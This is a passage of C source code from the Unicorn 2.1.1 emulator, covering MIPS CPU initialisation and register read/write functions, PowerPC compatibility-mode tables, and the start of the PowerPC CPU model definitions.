r4k_helper_tlbwr; env->tlb->helper_tlbp = r4k_helper_tlbp; env->tlb->helper_tlbr = r4k_helper_tlbr; env->tlb->helper_tlbinv = r4k_helper_tlbinv; env->tlb->helper_tlbinvf = r4k_helper_tlbinvf; } static void mmu_init (CPUMIPSState *env, const mips_def_t *def) { env->tlb = g_malloc0(sizeof(CPUMIPSTLBContext)); switch (def->mmu_type) { case MMU_TYPE_NONE: no_mmu_init(env, def); break; case MMU_TYPE_R4000: r4k_mmu_init(env, def); break; case MMU_TYPE_FMT: fixed_mmu_init(env, def); break; case MMU_TYPE_R3000: case MMU_TYPE_R6000: case MMU_TYPE_R8000: default: cpu_abort(env_cpu(env), "MMU type not supported\n"); } } static void fpu_init (CPUMIPSState *env, const mips_def_t *def) { int i; for (i = 0; i < MIPS_FPU_MAX; i++) env->fpus[i].fcr0 = def->CP1_fcr0; memcpy(&env->active_fpu, &env->fpus[0], sizeof(env->active_fpu)); } static void mvp_init (CPUMIPSState *env, const mips_def_t *def) { env->mvp = g_malloc0(sizeof(CPUMIPSMVPContext)); /* MVPConf1 implemented, TLB sharable, no gating storage support, programmable cache partitioning implemented, number of allocatable and sharable TLB entries, MVP has allocatable TCs, 2 VPEs implemented, 5 TCs implemented. */ env->mvp->CP0_MVPConf0 = (1U << CP0MVPC0_M) | (1 << CP0MVPC0_TLBS) | (0 << CP0MVPC0_GS) | (1 << CP0MVPC0_PCP) | // TODO: actually do 2 VPEs. // (1 << CP0MVPC0_TCA) | (0x1 << CP0MVPC0_PVPE) | // (0x04 << CP0MVPC0_PTC); (1 << CP0MVPC0_TCA) | (0x0 << CP0MVPC0_PVPE) | (0x00 << CP0MVPC0_PTC); /* Usermode has no TLB support */ env->mvp->CP0_MVPConf0 |= (env->tlb->nb_tlb << CP0MVPC0_PTLBE); /* Allocatable CP1 have media extensions, allocatable CP1 have FP support, no UDI implemented, no CP2 implemented, 1 CP1 implemented. 
 */
    env->mvp->CP0_MVPConf1 = (1U << CP0MVPC1_CIM) | (1 << CP0MVPC1_CIF) |
                             (0x0 << CP0MVPC1_PCX) | (0x0 << CP0MVPC1_PCP2) |
                             (0x1 << CP0MVPC1_PCP1);
}

static void msa_reset(CPUMIPSState *env)
{
    /*
     * MSA CSR:
     * - non-signaling floating point exception mode off (NX bit is 0)
     * - Cause, Enables, and Flags are all 0
     * - round to nearest / ties to even (RM bits are 0)
     */
    env->active_tc.msacsr = 0;
    restore_msa_fp_status(env);
    /* tininess detected after rounding. */
    set_float_detect_tininess(float_tininess_after_rounding,
                              &env->active_tc.msa_fp_status);
    /* clear float_status exception flags */
    set_float_exception_flags(0, &env->active_tc.msa_fp_status);
    /* clear float_status nan mode */
    set_default_nan_mode(0, &env->active_tc.msa_fp_status);
    /* set proper signaling bit meaning ("1" means "quiet") */
    set_snan_bit_is_one(0, &env->active_tc.msa_fp_status);
}

/* ==== unicorn-2.1.1/qemu/target/mips/unicorn.c ==== */

/* Unicorn Emulator Engine */
/* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */
/* Modified for Unicorn Engine by Chen Huitao<chenhuitao@hfmrit.com>, 2020 */

#include "sysemu/cpus.h"
#include "cpu.h"
#include "unicorn_common.h"
#include "uc_priv.h"
#include "unicorn.h"
#include "internal.h"

#ifdef TARGET_MIPS64
typedef uint64_t mipsreg_t;
#else
typedef uint32_t mipsreg_t;
#endif

MIPSCPU *cpu_mips_init(struct uc_struct *uc);

static void mips_set_pc(struct uc_struct *uc, uint64_t address)
{
    ((CPUMIPSState *)uc->cpu->env_ptr)->active_tc.PC = address;
}

static uint64_t mips_get_pc(struct uc_struct *uc)
{
    return ((CPUMIPSState *)uc->cpu->env_ptr)->active_tc.PC;
}

static void mips_release(void *ctx)
{
    int i;
    TCGContext *tcg_ctx = (TCGContext *)ctx;
    MIPSCPU *cpu = (MIPSCPU *)tcg_ctx->uc->cpu;
    CPUTLBDesc *d = cpu->neg.tlb.d;
    CPUTLBDescFast *f = cpu->neg.tlb.f;
    CPUTLBDesc *desc;
    CPUTLBDescFast *fast;

    release_common(ctx);
    for (i = 0; i < NB_MMU_MODES; i++) {
        desc = &(d[i]);
        fast = &(f[i]);
        g_free(desc->iotlb);
        g_free(fast->table);
    }
    g_free(cpu->env.mvp);
    g_free(cpu->env.tlb);
}

static void reg_reset(struct uc_struct *uc)
{
    CPUArchState *env;
    (void)uc;

    env = uc->cpu->env_ptr;
    memset(env->active_tc.gpr, 0, sizeof(env->active_tc.gpr));
    env->active_tc.PC = 0;
}
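/*
 * Illustrative host-side sketch (an assumption, not part of this file):
 * reg_read()/reg_write() below back the public uc_reg_read()/uc_reg_write()
 * API once uc_init() has installed them in the uc_struct. A minimal caller
 * might look like (error checking omitted):
 *
 *     #include <unicorn/unicorn.h>
 *
 *     uc_engine *uc;
 *     uint32_t v = 0x2000;
 *     uc_open(UC_ARCH_MIPS, UC_MODE_MIPS32 | UC_MODE_BIG_ENDIAN, &uc);
 *     uc_reg_write(uc, UC_MIPS_REG_SP, &v);  // lands in active_tc.gpr[29]
 *     uc_reg_read(uc, UC_MIPS_REG_PC, &v);   // served by reg_read() below
 *     uc_close(uc);
 *
 * The caller's buffer is expected to hold a full mipsreg_t (32 or 64 bits
 * depending on TARGET_MIPS64); CHECK_REG_TYPE() enforces the size.
 */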
DEFAULT_VISIBILITY
uc_err reg_read(void *_env, int mode, unsigned int regid, void *value,
                size_t *size)
{
    CPUMIPSState *env = _env;
    uc_err ret = UC_ERR_ARG;

    if (regid >= UC_MIPS_REG_0 && regid <= UC_MIPS_REG_31) {
        CHECK_REG_TYPE(mipsreg_t);
        *(mipsreg_t *)value = env->active_tc.gpr[regid - UC_MIPS_REG_0];
    } else {
        switch (regid) {
        default:
            break;
        case UC_MIPS_REG_HI:
            CHECK_REG_TYPE(mipsreg_t);
            *(mipsreg_t *)value = env->active_tc.HI[0];
            break;
        case UC_MIPS_REG_LO:
            CHECK_REG_TYPE(mipsreg_t);
            *(mipsreg_t *)value = env->active_tc.LO[0];
            break;
        case UC_MIPS_REG_PC:
            CHECK_REG_TYPE(mipsreg_t);
            *(mipsreg_t *)value = env->active_tc.PC;
            break;
        case UC_MIPS_REG_CP0_CONFIG3:
            CHECK_REG_TYPE(mipsreg_t);
            *(mipsreg_t *)value = env->CP0_Config3;
            break;
        case UC_MIPS_REG_CP0_STATUS:
            CHECK_REG_TYPE(mipsreg_t);
            *(mipsreg_t *)value = env->CP0_Status;
            break;
        case UC_MIPS_REG_CP0_USERLOCAL:
            CHECK_REG_TYPE(mipsreg_t);
            *(mipsreg_t *)value = env->active_tc.CP0_UserLocal;
            break;
        }
    }

    return ret;
}

DEFAULT_VISIBILITY
uc_err reg_write(void *_env, int mode, unsigned int regid, const void *value,
                 size_t *size, int *setpc)
{
    CPUMIPSState *env = _env;
    uc_err ret = UC_ERR_ARG;

    if (regid >= UC_MIPS_REG_0 && regid <= UC_MIPS_REG_31) {
        CHECK_REG_TYPE(mipsreg_t);
        env->active_tc.gpr[regid - UC_MIPS_REG_0] = *(mipsreg_t *)value;
    } else {
        switch (regid) {
        default:
            break;
        case UC_MIPS_REG_HI:
            CHECK_REG_TYPE(mipsreg_t);
            env->active_tc.HI[0] = *(mipsreg_t *)value;
            break;
        case UC_MIPS_REG_LO:
            CHECK_REG_TYPE(mipsreg_t);
            env->active_tc.LO[0] = *(mipsreg_t *)value;
            break;
        case UC_MIPS_REG_PC:
            CHECK_REG_TYPE(mipsreg_t);
            env->active_tc.PC = *(mipsreg_t *)value;
            *setpc = 1;
            break;
        case UC_MIPS_REG_CP0_CONFIG3:
            CHECK_REG_TYPE(mipsreg_t);
            env->CP0_Config3 = *(mipsreg_t *)value;
            break;
        case UC_MIPS_REG_CP0_STATUS:
            // TODO: ALL CP0 REGS
            // https://s3-eu-west-1.amazonaws.com/downloads-mips/documents/MD00090-2B-MIPS32PRA-AFP-06.02.pdf
            // https://s3-eu-west-1.amazonaws.com/downloads-mips/documents/MD00582-2B-microMIPS32-AFP-05.04.pdf
            CHECK_REG_TYPE(mipsreg_t);
            env->CP0_Status = *(mipsreg_t *)value;
            compute_hflags(env);
            break;
        case UC_MIPS_REG_CP0_USERLOCAL:
            CHECK_REG_TYPE(mipsreg_t);
            env->active_tc.CP0_UserLocal = *(mipsreg_t *)value;
            break;
        }
    }

    return ret;
}

static int mips_cpus_init(struct uc_struct *uc, const char *cpu_model)
{
    MIPSCPU *cpu;

    cpu = cpu_mips_init(uc);
    if (cpu == NULL) {
        return -1;
    }

    return 0;
}

DEFAULT_VISIBILITY
void uc_init(struct uc_struct *uc)
{
    uc->reg_read = reg_read;
    uc->reg_write = reg_write;
    uc->reg_reset = reg_reset;
    uc->release = mips_release;
    uc->set_pc = mips_set_pc;
    uc->get_pc = mips_get_pc;
    uc->cpus_init = mips_cpus_init;
    uc->cpu_context_size = offsetof(CPUMIPSState, end_reset_fields);
    uc_common_init(uc);
}

/* ==== unicorn-2.1.1/qemu/target/mips/unicorn.h ==== */

/* Unicorn Emulator Engine */
/* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */

#ifndef UC_QEMU_TARGET_MIPS_H
#define UC_QEMU_TARGET_MIPS_H

// functions to read & write registers
uc_err reg_read_mips(void *env, int mode, unsigned int regid, void *value,
                     size_t *size);
uc_err reg_read_mipsel(void *env, int mode, unsigned int regid, void *value,
                       size_t *size);
uc_err reg_read_mips64(void *env, int mode, unsigned int regid, void *value,
                       size_t *size);
uc_err reg_read_mips64el(void *env, int mode, unsigned int regid, void *value,
                         size_t *size);

uc_err reg_write_mips(void *env, int mode, unsigned int regid,
                      const void *value, size_t *size, int *setpc);
uc_err reg_write_mipsel(void *env, int mode, unsigned int regid,
                        const void *value, size_t *size, int *setpc);
uc_err reg_write_mips64(void *env, int mode, unsigned int regid,
                        const void *value, size_t *size, int *setpc);
uc_err reg_write_mips64el(void *env, int mode, unsigned int regid,
                          const void *value, size_t *size, int *setpc);
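/*
 * A hedged note on the four variants above and below: each MIPS target
 * (mips, mipsel, mips64, mips64el) compiles the same generic unicorn.c, and
 * a generated per-target rename header (assumed here to be the symbols.sh
 * output, e.g. qemu/mips.h) maps the generic names onto suffixed ones,
 * conceptually:
 *
 *     #define reg_read  reg_read_mips
 *     #define reg_write reg_write_mips
 *     #define uc_init   uc_init_mips
 *
 * so all four declarations of each function resolve to the one definition
 * in unicorn.c of the corresponding compiled target.
 */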
void uc_init_mips(struct uc_struct *uc);
void uc_init_mipsel(struct uc_struct *uc);
void uc_init_mips64(struct uc_struct *uc);
void uc_init_mips64el(struct uc_struct *uc);

#endif

/* ==== unicorn-2.1.1/qemu/target/ppc/compat.c ==== */

/*
 * PowerPC CPU initialization for qemu.
 *
 * Copyright 2016, David Gibson, Red Hat Inc. <dgibson@redhat.com>
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#include "qemu/osdep.h"
#include "sysemu/cpus.h"
#include "cpu-models.h"
#include "cpu.h"

typedef struct {
    const char *name;
    uint32_t pvr;
    uint64_t pcr;
    uint64_t pcr_level;

    /*
     * Maximum allowed virtual threads per virtual core
     *
     * This is to stop older guests getting confused by seeing more
     * threads than they think the cpu can support. Usually it's
     * equal to the number of threads supported on bare metal
     * hardware, but not always (see POWER9).
*/ int max_vthreads; } CompatInfo; static const CompatInfo compat_table[] = { /* * Ordered from oldest to newest - the code relies on this */ { /* POWER6, ISA2.05 */ .name = "power6", .pvr = CPU_POWERPC_LOGICAL_2_05, .pcr = PCR_COMPAT_3_10 | PCR_COMPAT_3_00 | PCR_COMPAT_2_07 | PCR_COMPAT_2_06 | PCR_COMPAT_2_05 | PCR_TM_DIS | PCR_VSX_DIS, .pcr_level = PCR_COMPAT_2_05, .max_vthreads = 2, }, { /* POWER7, ISA2.06 */ .name = "power7", .pvr = CPU_POWERPC_LOGICAL_2_06, .pcr = PCR_COMPAT_3_10 | PCR_COMPAT_3_00 | PCR_COMPAT_2_07 | PCR_COMPAT_2_06 | PCR_TM_DIS, .pcr_level = PCR_COMPAT_2_06, .max_vthreads = 4, }, { .name = "power7+", .pvr = CPU_POWERPC_LOGICAL_2_06_PLUS, .pcr = PCR_COMPAT_3_10 | PCR_COMPAT_3_00 | PCR_COMPAT_2_07 | PCR_COMPAT_2_06 | PCR_TM_DIS, .pcr_level = PCR_COMPAT_2_06, .max_vthreads = 4, }, { /* POWER8, ISA2.07 */ .name = "power8", .pvr = CPU_POWERPC_LOGICAL_2_07, .pcr = PCR_COMPAT_3_10 | PCR_COMPAT_3_00 | PCR_COMPAT_2_07, .pcr_level = PCR_COMPAT_2_07, .max_vthreads = 8, }, { /* POWER9, ISA3.00 */ .name = "power9", .pvr = CPU_POWERPC_LOGICAL_3_00, .pcr = PCR_COMPAT_3_10 | PCR_COMPAT_3_00, .pcr_level = PCR_COMPAT_3_00, /* * POWER9 hardware only supports 4 threads / core, but this * limit is for guests. We need to support 8 vthreads/vcore * on POWER9 for POWER8 compatibility guests, and it's very * confusing if half of the threads disappear from the guest * if it announces it's POWER9 aware at CAS time. */ .max_vthreads = 8, }, { /* POWER10, ISA3.10 */ .name = "power10", .pvr = CPU_POWERPC_LOGICAL_3_10, .pcr = PCR_COMPAT_3_10, .pcr_level = PCR_COMPAT_3_10, .max_vthreads = 8, }, }; static const CompatInfo *compat_by_pvr(uint32_t pvr) { int i; for (i = 0; i < ARRAY_SIZE(compat_table); i++) { if (compat_table[i].pvr == pvr) { return &compat_table[i]; } } return NULL; } static bool pcc_compat(PowerPCCPUClass *pcc, uint32_t compat_pvr, uint32_t min_compat_pvr, uint32_t max_compat_pvr) { const CompatInfo *compat = compat_by_pvr(compat_pvr); const CompatInfo *min = compat_by_pvr(min_compat_pvr); const CompatInfo *max = compat_by_pvr(max_compat_pvr); g_assert(!min_compat_pvr || min); g_assert(!max_compat_pvr || max); if (!compat) { /* Not a recognized logical PVR */ return false; } if ((min && (compat < min)) || (max && (compat > max))) { /* Outside specified range */ return false; } if (!(pcc->pcr_supported & compat->pcr_level)) { /* Not supported by this CPU */ return false; } return true; } bool ppc_check_compat(PowerPCCPU *cpu, uint32_t compat_pvr, uint32_t min_compat_pvr, uint32_t max_compat_pvr) { PowerPCCPUClass *pcc = POWERPC_CPU_GET_CLASS(cpu); // g_assert(cpu->vhyp); return pcc_compat(pcc, compat_pvr, min_compat_pvr, max_compat_pvr); } #if 0 bool ppc_type_check_compat(const char *cputype, uint32_t compat_pvr, uint32_t min_compat_pvr, uint32_t max_compat_pvr) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(object_class_by_name(cputype)); return pcc_compat(pcc, compat_pvr, min_compat_pvr, max_compat_pvr); } void ppc_set_compat(PowerPCCPU *cpu, uint32_t compat_pvr) { const CompatInfo *compat = compat_by_pvr(compat_pvr); CPUPPCState *env = &cpu->env; PowerPCCPUClass *pcc = POWERPC_CPU_GET_CLASS(cpu); uint64_t pcr; if (!compat_pvr) { pcr = 0; } else if (!compat) { error_setg(errp, "Unknown compatibility PVR 0x%08"PRIx32, compat_pvr); return; } else if (!ppc_check_compat(cpu, compat_pvr, 0, 0)) { error_setg(errp, "Compatibility PVR 0x%08"PRIx32" not valid for CPU", compat_pvr); return; } else { pcr = compat->pcr; } cpu_synchronize_state(CPU(cpu)); if (kvm_enabled() && cpu->compat_pvr != 
compat_pvr) { int ret = kvmppc_set_compat(cpu, compat_pvr); if (ret < 0) { error_setg_errno(errp, -ret, "Unable to set CPU compatibility mode in KVM"); return; } } cpu->compat_pvr = compat_pvr; env->spr[SPR_PCR] = pcr & pcc->pcr_mask; } typedef struct { uint32_t compat_pvr; } SetCompatState; static void do_set_compat(CPUState *cs, run_on_cpu_data arg) { PowerPCCPU *cpu = POWERPC_CPU(cs); SetCompatState *s = arg.host_ptr; ppc_set_compat(cpu, s->compat_pvr, &s->err); } void ppc_set_compat_all(uint32_t compat_pvr) { CPUState *cs; CPU_FOREACH(cs) { SetCompatState s = { .compat_pvr = compat_pvr, .err = NULL, }; run_on_cpu(cs, do_set_compat, RUN_ON_CPU_HOST_PTR(&s)); if (s.err) { #if 0 error_propagate(errp, s.err); #endif return; } } } int ppc_compat_max_vthreads(PowerPCCPU *cpu) { const CompatInfo *compat = compat_by_pvr(cpu->compat_pvr); int n_threads = CPU(cpu)->nr_threads; if (cpu->compat_pvr) { g_assert(compat); n_threads = MIN(n_threads, compat->max_vthreads); } return n_threads; } static void ppc_compat_prop_get(Object *obj, Visitor *v, const char *name, void *opaque, Error **errp) { uint32_t compat_pvr = *((uint32_t *)opaque); const char *value; if (!compat_pvr) { value = ""; } else { const CompatInfo *compat = compat_by_pvr(compat_pvr); g_assert(compat); value = compat->name; } visit_type_str(v, name, (char **)&value, errp); } static void ppc_compat_prop_set(Object *obj, Visitor *v, const char *name, void *opaque, Error **errp) { Error *local_err = NULL; char *value; uint32_t compat_pvr; visit_type_str(v, name, &value, &local_err); if (local_err) { error_propagate(errp, local_err); return; } if (strcmp(value, "") == 0) { compat_pvr = 0; } else { int i; const CompatInfo *compat = NULL; for (i = 0; i < ARRAY_SIZE(compat_table); i++) { if (strcmp(value, compat_table[i].name) == 0) { compat = &compat_table[i]; break; } } if (!compat) { error_setg(errp, "Invalid compatibility mode \"%s\"", value); goto out; } compat_pvr = compat->pvr; } *((uint32_t *)opaque) = compat_pvr; out: g_free(value); } void ppc_compat_add_property(Object *obj, const char *name, uint32_t *compat_pvr, const char *basedesc, Error **errp) { Error *local_err = NULL; gchar *namesv[ARRAY_SIZE(compat_table) + 1]; gchar *names, *desc; int i; object_property_add(obj, name, "string", ppc_compat_prop_get, ppc_compat_prop_set, NULL, compat_pvr, &local_err); if (local_err) { goto out; } for (i = 0; i < ARRAY_SIZE(compat_table); i++) { /* * Have to discard const here, because g_strjoinv() takes * (gchar **), not (const gchar **) :( */ namesv[i] = (gchar *)compat_table[i].name; } namesv[ARRAY_SIZE(compat_table)] = NULL; names = g_strjoinv(", ", namesv); desc = g_strdup_printf("%s. 
Valid values are %s.", basedesc, names); object_property_set_description(obj, name, desc, &local_err); g_free(names); g_free(desc); out: error_propagate(errp, local_err); } #endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/cpu-models.c����������������������������������������������������������0000664�0000000�0000000�00000136777�14675241067�0020464�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * PowerPC CPU initialization for qemu. * * Copyright (c) 2003-2007 Jocelyn Mayer * Copyright 2011 Freescale Semiconductor, Inc. * Copyright 2013 SUSE LINUX Products GmbH * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. 
*/ #include "qemu/osdep.h" #include "cpu.h" #include "cpu-models.h" #if 0 /***************************************************************************/ /* PowerPC CPU definitions */ #define POWERPC_DEF_PREFIX(pvr, svr, type) \ glue(glue(glue(glue(pvr, _), svr), _), type) #define POWERPC_DEF_SVR(_name, _desc, _pvr, _svr, _type) \ static void \ glue(POWERPC_DEF_PREFIX(_pvr, _svr, _type), _cpu_class_init) \ (CPUClass *oc, void *data) \ { \ PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); \ \ pcc->pvr = _pvr; \ pcc->svr = _svr; \ } \ #define POWERPC_DEF(_name, _pvr, _type, _desc) \ POWERPC_DEF_SVR(_name, _desc, _pvr, POWERPC_SVR_NONE, _type) /* Embedded PowerPC */ /* PowerPC 401 family */ POWERPC_DEF("401", CPU_POWERPC_401, 401, "Generic PowerPC 401") /* PowerPC 401 cores */ POWERPC_DEF("401a1", CPU_POWERPC_401A1, 401, "PowerPC 401A1") POWERPC_DEF("401b2", CPU_POWERPC_401B2, 401x2, "PowerPC 401B2") POWERPC_DEF("401c2", CPU_POWERPC_401C2, 401x2, "PowerPC 401C2") POWERPC_DEF("401d2", CPU_POWERPC_401D2, 401x2, "PowerPC 401D2") POWERPC_DEF("401e2", CPU_POWERPC_401E2, 401x2, "PowerPC 401E2") POWERPC_DEF("401f2", CPU_POWERPC_401F2, 401x2, "PowerPC 401F2") /* XXX: to be checked */ POWERPC_DEF("401g2", CPU_POWERPC_401G2, 401x2, "PowerPC 401G2") /* PowerPC 401 microcontrollers */ POWERPC_DEF("iop480", CPU_POWERPC_IOP480, IOP480, "IOP480 (401 microcontroller)") POWERPC_DEF("cobra", CPU_POWERPC_COBRA, 401, "IBM Processor for Network Resources") /* PowerPC 403 family */ /* PowerPC 403 microcontrollers */ POWERPC_DEF("403ga", CPU_POWERPC_403GA, 403, "PowerPC 403 GA") POWERPC_DEF("403gb", CPU_POWERPC_403GB, 403, "PowerPC 403 GB") POWERPC_DEF("403gc", CPU_POWERPC_403GC, 403, "PowerPC 403 GC") POWERPC_DEF("403gcx", CPU_POWERPC_403GCX, 403GCX, "PowerPC 403 GCX") /* PowerPC 405 family */ /* PowerPC 405 cores */ POWERPC_DEF("405d2", CPU_POWERPC_405D2, 405, "PowerPC 405 D2") POWERPC_DEF("405d4", CPU_POWERPC_405D4, 405, "PowerPC 405 D4") /* PowerPC 405 microcontrollers */ POWERPC_DEF("405cra", CPU_POWERPC_405CRa, 405, "PowerPC 405 CRa") POWERPC_DEF("405crb", CPU_POWERPC_405CRb, 405, "PowerPC 405 CRb") POWERPC_DEF("405crc", CPU_POWERPC_405CRc, 405, "PowerPC 405 CRc") POWERPC_DEF("405ep", CPU_POWERPC_405EP, 405, "PowerPC 405 EP") POWERPC_DEF("405ez", CPU_POWERPC_405EZ, 405, "PowerPC 405 EZ") POWERPC_DEF("405gpa", CPU_POWERPC_405GPa, 405, "PowerPC 405 GPa") POWERPC_DEF("405gpb", CPU_POWERPC_405GPb, 405, "PowerPC 405 GPb") POWERPC_DEF("405gpc", CPU_POWERPC_405GPc, 405, "PowerPC 405 GPc") POWERPC_DEF("405gpd", CPU_POWERPC_405GPd, 405, "PowerPC 405 GPd") POWERPC_DEF("405gpr", CPU_POWERPC_405GPR, 405, "PowerPC 405 GPR") POWERPC_DEF("405lp", CPU_POWERPC_405LP, 405, "PowerPC 405 LP") POWERPC_DEF("npe405h", CPU_POWERPC_NPE405H, 405, "Npe405 H") POWERPC_DEF("npe405h2", CPU_POWERPC_NPE405H2, 405, "Npe405 H2") POWERPC_DEF("npe405l", CPU_POWERPC_NPE405L, 405, "Npe405 L") POWERPC_DEF("npe4gs3", CPU_POWERPC_NPE4GS3, 405, "Npe4GS3") /* PowerPC 401/403/405 based set-top-box microcontrollers */ POWERPC_DEF("stb03", CPU_POWERPC_STB03, 405, "STB03xx") POWERPC_DEF("stb04", CPU_POWERPC_STB04, 405, "STB04xx") POWERPC_DEF("stb25", CPU_POWERPC_STB25, 405, "STB25xx") /* Xilinx PowerPC 405 cores */ POWERPC_DEF("x2vp4", CPU_POWERPC_X2VP4, 405, NULL) POWERPC_DEF("x2vp20", CPU_POWERPC_X2VP20, 405, NULL) /* PowerPC 440 family */ #if defined(TODO_USER_ONLY) POWERPC_DEF("440", CPU_POWERPC_440, 440GP, "Generic PowerPC 440") #endif /* PowerPC 440 cores */ POWERPC_DEF("440-xilinx", CPU_POWERPC_440_XILINX, 440x5, "PowerPC 440 Xilinx 5") 
POWERPC_DEF("440-xilinx-w-dfpu", CPU_POWERPC_440_XILINX, 440x5wDFPU, "PowerPC 440 Xilinx 5 With a Double Prec. FPU") /* PowerPC 440 microcontrollers */ POWERPC_DEF("440epa", CPU_POWERPC_440EPa, 440EP, "PowerPC 440 EPa") POWERPC_DEF("440epb", CPU_POWERPC_440EPb, 440EP, "PowerPC 440 EPb") POWERPC_DEF("440epx", CPU_POWERPC_440EPX, 440EP, "PowerPC 440 EPX") POWERPC_DEF("460exb", CPU_POWERPC_460EXb, 460EX, "PowerPC 460 EXb") #if defined(TODO_USER_ONLY) POWERPC_DEF("440gpb", CPU_POWERPC_440GPb, 440GP, "PowerPC 440 GPb") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440gpc", CPU_POWERPC_440GPc, 440GP, "PowerPC 440 GPc") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440gra", CPU_POWERPC_440GRa, 440x5, "PowerPC 440 GRa") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440grx", CPU_POWERPC_440GRX, 440x5, "PowerPC 440 GRX") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440gxa", CPU_POWERPC_440GXa, 440EP, "PowerPC 440 GXa") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440gxb", CPU_POWERPC_440GXb, 440EP, "PowerPC 440 GXb") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440gxc", CPU_POWERPC_440GXc, 440EP, "PowerPC 440 GXc") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440gxf", CPU_POWERPC_440GXf, 440EP, "PowerPC 440 GXf") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440sp", CPU_POWERPC_440SP, 440EP, "PowerPC 440 SP") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440sp2", CPU_POWERPC_440SP2, 440EP, "PowerPC 440 SP2") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440spe", CPU_POWERPC_440SPE, 440EP, "PowerPC 440 SPE") #endif /* Freescale embedded PowerPC cores */ /* MPC5xx family (aka RCPU) */ #if defined(TODO_USER_ONLY) POWERPC_DEF("mpc5xx", CPU_POWERPC_MPC5xx, MPC5xx, "Generic MPC5xx core") #endif /* MPC8xx family (aka PowerQUICC) */ #if defined(TODO_USER_ONLY) POWERPC_DEF("mpc8xx", CPU_POWERPC_MPC8xx, MPC8xx, "Generic MPC8xx core") #endif /* MPC82xx family (aka PowerQUICC-II) */ POWERPC_DEF("g2", CPU_POWERPC_G2, G2, "PowerPC G2 core") POWERPC_DEF("g2h4", CPU_POWERPC_G2H4, G2, "PowerPC G2 H4 core") POWERPC_DEF("g2gp", CPU_POWERPC_G2gp, G2, "PowerPC G2 GP core") POWERPC_DEF("g2ls", CPU_POWERPC_G2ls, G2, "PowerPC G2 LS core") POWERPC_DEF("g2hip3", CPU_POWERPC_G2_HIP3, G2, "PowerPC G2 HiP3 core") POWERPC_DEF("g2hip4", CPU_POWERPC_G2_HIP4, G2, "PowerPC G2 HiP4 core") POWERPC_DEF("mpc603", CPU_POWERPC_MPC603, 603E, "PowerPC MPC603 core") POWERPC_DEF("g2le", CPU_POWERPC_G2LE, G2LE, "PowerPC G2le core (same as G2 plus little-endian mode support)") POWERPC_DEF("g2legp", CPU_POWERPC_G2LEgp, G2LE, "PowerPC G2LE GP core") POWERPC_DEF("g2lels", CPU_POWERPC_G2LEls, G2LE, "PowerPC G2LE LS core") POWERPC_DEF("g2legp1", CPU_POWERPC_G2LEgp1, G2LE, "PowerPC G2LE GP1 core") POWERPC_DEF("g2legp3", CPU_POWERPC_G2LEgp3, G2LE, "PowerPC G2LE GP3 core") /* PowerPC G2 microcontrollers */ POWERPC_DEF_SVR("mpc5200_v10", "MPC5200 v1.0", CPU_POWERPC_MPC5200_v10, POWERPC_SVR_5200_v10, G2LE) POWERPC_DEF_SVR("mpc5200_v11", "MPC5200 v1.1", CPU_POWERPC_MPC5200_v11, POWERPC_SVR_5200_v11, G2LE) POWERPC_DEF_SVR("mpc5200_v12", "MPC5200 v1.2", CPU_POWERPC_MPC5200_v12, POWERPC_SVR_5200_v12, G2LE) POWERPC_DEF_SVR("mpc5200b_v20", "MPC5200B v2.0", CPU_POWERPC_MPC5200B_v20, POWERPC_SVR_5200B_v20, G2LE) POWERPC_DEF_SVR("mpc5200b_v21", "MPC5200B v2.1", CPU_POWERPC_MPC5200B_v21, POWERPC_SVR_5200B_v21, G2LE) /* e200 family */ POWERPC_DEF("e200z5", CPU_POWERPC_e200z5, e200, "PowerPC e200z5 core") POWERPC_DEF("e200z6", CPU_POWERPC_e200z6, e200, "PowerPC e200z6 core") /* e300 family */ POWERPC_DEF("e300c1", CPU_POWERPC_e300c1, e300, 
